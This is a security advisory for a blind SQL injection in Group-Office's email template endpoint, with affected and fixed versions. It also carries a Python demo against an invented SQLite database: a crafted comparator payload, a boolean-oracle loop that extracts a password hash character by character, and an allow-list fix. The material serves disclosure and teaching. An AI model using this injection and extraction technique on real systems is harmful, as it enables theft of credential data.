Group-Office SQL Injection Vulnerability in Email Template Selection Endpoint

Vulnerability

A SQL injection vulnerability has been identified in Group-Office, an enterprise CRM and groupware tool. It affects the 6.8 branch through 6.8.152, the 25.0 branch through 25.0.85 and the 26.0 branch through 26.0.7. The flaw is in the email template selection endpoint, where the 'comparator' field of the 'advancedQueryData' parameter is used to build the query without being validated against the set of supported operators. An authenticated user can therefore inject boolean-based SQL expressions and, by observing whether the request returns results, blindly exfiltrate sensitive data from the 'core_auth_password' table. Sufficiently complex injected expressions can also degrade database performance.
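The pattern the advisory describes, as an added illustration that is not Group-Office code: a query builder that parameterises the value but pastes the user-supplied comparator into the SQL text, a boolean oracle that uses it to recover a password hash one character at a time from a constructed table, and the hardened builder that maps the comparator through an allow-list. The endpoint shape, the schema, the column names and the set of supported comparators are all assumptions made for the demo.

```python
import sqlite3

# Constructed schema and rows for the demo. The password table is named after the
# one the advisory mentions, but its columns and contents are invented here.
SCHEMA = """
CREATE TABLE email_template (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE core_auth_password (user_id INTEGER PRIMARY KEY, password TEXT);
INSERT INTO email_template VALUES (1, 'Welcome'), (2, 'Invoice');
INSERT INTO core_auth_password VALUES (1, '$2y$10$abc123');
"""


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def select_templates_vulnerable(conn, comparator, value):
    # Hypothetical vulnerable builder: the value is bound as a parameter, but the
    # comparator string from the request is interpolated straight into the SQL.
    sql = f"SELECT id FROM email_template WHERE name {comparator} ?"
    return conn.execute(sql, (value,)).fetchall()


# Assumed allow-list: request-side comparator names mapped to SQL operators.
COMPARATORS = {
    "=": "=", "!=": "<>", "<": "<", "<=": "<=", ">": ">", ">=": ">=", "LIKE": "LIKE",
}


def select_templates_fixed(conn, comparator, value):
    # Hardened builder: only a known operator ever reaches the SQL text.
    op = COMPARATORS.get(comparator)
    if op is None:
        raise ValueError(f"unsupported comparator: {comparator!r}")
    sql = f"SELECT id FROM email_template WHERE name {op} ?"
    return conn.execute(sql, (value,)).fetchall()


def comparator_is_rejected(conn, comparator):
    try:
        select_templates_fixed(conn, comparator, "x")
    except ValueError:
        return True
    return False


def oracle_payload(condition):
    # Crafted comparator. It keeps exactly one '?' placeholder so the statement
    # still parses; the OR branch matches every row iff the condition is true.
    return f"= '' OR ({condition}) OR name ="


def blind_extract(conn, query_fn, length, charset):
    # Boolean-based blind extraction: a non-empty result set means "true".
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM core_auth_password "
                    f"WHERE user_id = 1) = '{ch}'")
            rows = query_fn(conn, oracle_payload(cond), "no-such-template")
            if rows:
                recovered += ch
                break
        else:
            break  # no candidate matched: end of string or character not in charset
    return recovered


if __name__ == "__main__":
    db = open_demo_db()
    charset = "$0123456789abcdefghijklmnopqrstuvwxyz"
    print("vulnerable builder leaks:", blind_extract(db, select_templates_vulnerable, 13, charset))
    print("fixed builder rejects payload:", comparator_is_rejected(db, oracle_payload("1=1")))
    print("fixed builder, legitimate query:", select_templates_fixed(db, "LIKE", "Inv%"))
```

The fix maps the comparator through a dictionary rather than escaping it: operators are a closed vocabulary, so anything outside the allow-list is rejected before any SQL is built. The oracle never sees the extracted data directly, only whether rows came back, which is what makes the technique blind and why each character costs up to one request per candidate symbol; the same mechanism is what lets an attacker submit arbitrarily expensive subqueries, the performance concern the advisory also notes.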

Impact

Exploitation gives an authenticated attacker unauthorized read access to password data in the core_auth_password table, recovered through blind exfiltration. Data integrity is not directly affected, but heavy injected queries can degrade database performance.

Remediation

Users can upgrade to Group-Office versions 26.0.8, 25.0.87, or 6.8.153 to address this vulnerability.

Added: Feb 27, 2026, 8:25 PM
Updated: Feb 27, 2026, 8:25 PM

Vulnerability Rating

Custom Algorithm
spread: 3.1
impact: 2.5
exploitability: 6.3
remediation: 7.7
relevance: 3.3
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.